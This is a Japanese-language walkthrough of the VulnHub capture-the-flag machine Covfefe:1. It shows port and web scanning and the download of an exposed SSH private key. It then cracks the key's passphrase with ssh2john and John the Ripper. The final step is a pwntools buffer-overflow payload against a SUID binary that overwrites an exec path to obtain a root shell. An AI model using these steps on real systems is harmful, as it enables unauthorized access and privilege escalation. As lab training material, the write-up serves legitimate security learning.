Covfefe: 1 VulnHub Walkthrough
nmap -Pn -sS -sV -p- 192.168.0.35
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10 (protocol 2.0) 80/tcp open http nginx 1.10.3 31337/tcp open http Werkzeug httpd 0.11.15 (Python 3.5.3)
ssh、80と31337でhttpが動いていることがわかります。
nikto -h 192.168.0.35
特に何もでず....
gobuster dir -u http://192.168.0.35 -w /usr/share/dirb/wordlists/big.txt -t 50 -q
これも特に何もでず....
nikto -h http://192.168.0.35:31337
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 1499600596.267103, size: 70, mtime: 1587808388 + Entry '/.bashrc' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/.profile' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/taxes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 3 entries which should be manually viewed. + Allowed HTTP Methods: GET, HEAD, OPTIONS + OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information. + OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration. + OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh/id_rsa: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + OSVDB-3093: /.ssh/id_rsa.pub: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web. + 7935 requests: 12 error(s) and 15 item(s) reported on remote h
robots.txtや.sshディレクトリにある秘密鍵id_rsaでsshに接続できそうな気がしますね。
1つずつ確認していきます。
/taxes
Good job! Here is a flag: flag1{make_america_great_again}
flag1つ目がありました。
/.ssh
['id_rsa', 'authorized_keys', 'id_rsa.pub']
/.ssh/id_rsa
chmod 600 id_rsa
sshに接続するときにid_rsaを利用するためにid_rsaにパーミッション600を設定します。
ssh -i id_rsa simon@192.168.0.35
Enter passphrase for key 'id_rsa': simon@192.168.0.35: Permission denied (publickey).
パスフレーズが必要なのでssh2johnで解析します。
python3 /usr/share/john/ssh2john.py
# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
john hash.txt
starwars (id_rsa)
ssh -i id_rsa simon@192.168.0.35
Enter passphrase for key 'id_rsa': Linux covfefe 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) i686 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. simon@covfefe:~$
そのユーザの権限で実行されるSUIDが設定されているファイルを探します。
$ find / -perm -4000 2>/dev/null /usr/bin/chsh /usr/bin/passwd /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/local/bin/read_message /bin/umount /bin/su /bin/mount /bin/ping
どう考えても/usr/local/bin/read_messageが怪しいことがわかります。 stringsコマンドもないのでローカル環境に一旦ダウンロードするためにpython3で簡易HTTPサーバを立てます。
simon@covfefe:/tmp$ python3 -m http.server 8000 Serving HTTP on 0.0.0.0 port 8000 ... 192.168.0.26 - - [08/Jun/2020 01:47:19] "GET /read_message HTTP/1.1" 200 -
ローカルで環境でltraceを利用することでSimonを入力することで条件分岐がTrueになることがわかります。
ltrace ./read_message
__libc_start_main(0x5656a690, 1, 0xffddab84, 0x5656a760 <unfinished ...> puts("What is your name?"What is your name? ) = 19 gets(0xffddaab8, 0x695383fc, 0x6e6f6d, 1Simon ) = 0xffddaab8 strncmp("Simon", "Simon", 5) = 0 printf("Hello %s! Here is your message:\n"..., "Simon"Hello Simon! Here is your message: ) = 36 execve(0xffddaacc, 0, 0, 0x695383fc) = 0xffffffff +++ exited (status 0) +++
simon@covfefe:/tmp$ /usr/local/bin/read_message What is your name? Simon Hello Simon! Here is your message: Hi Simon, I hope you like our private messaging system. I'm really happy with how it worked out! If you're interested in how it works, I've left a copy of the source code in my home directory. - Charlie Root
/rootにソースコードがあるようなので確認をします。ここに2つ目のflagがあることがわかります。
simon@covfefe:/root$ cat flag.txt cat: flag.txt: Permission denied simon@covfefe:/root$ cat read_message.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> // You're getting close! Here's another flag: // flag2{use_the_source_luke} int main(int argc, char *argv[]) { char program[] = "/usr/local/sbin/message"; char buf[20]; char authorized[] = "Simon"; printf("What is your name?\n"); gets(buf); // Only compare first five chars to save precious cycles: if (!strncmp(authorized, buf, 5)) { printf("Hello %s! Here is your message:\n\n", buf); // This is safe as the user can't mess with the binary location: execve(program, NULL, NULL); } else { printf("Sorry %s, you're not %s! The Internet Police have been informed of this violation.\n", buf, authorized); exit(EXIT_FAILURE); } } simon@covfefe:/root$
bufがSimonであるときに、programが実行されることがわかります。ここを/bin/shに書き換えられたら、root権限でシェルを起動できます。
ローカル環境でいろいろ試してると、BOFがあることがわかります。
root@kali:~/vulnhub/covfefe_1# ./read_message What is your name? Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Hello Simonaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa! Here is your message: Segmentation fault
bufのサイズは20バイトでスタックで考えるとその下にprogram変数があるので20バイトpaddingすればその次からprogram変数が書き換えられると予想することができます。
以下のExploitコードを作成し、ローカル環境で動かしたところshellを起動することができたのでpayloadをコピペしリモート環境でも試したところroot権限でシェルを起動することができました。
from pwn import * e = ELF('./read_message') p = process('./read_message') payload = 'Simon' payload += 'A'*(20-len(payload)) payload += '/bin/sh' print "payload: " + payload p.sendline(payload) p.sendline('/bin/sh') p.interactive()
simon@covfefe:/root$ /usr/local/bin/read_message What is your name? SimonAAAAAAAAAAAAAAA/bin/sh Hello SimonAAAAAAAAAAAAAAA/bin/sh! Here is your message: # whoami root # cat /root/flag.txt You did it! Congratulations, here's the final flag: flag3{das_bof_meister}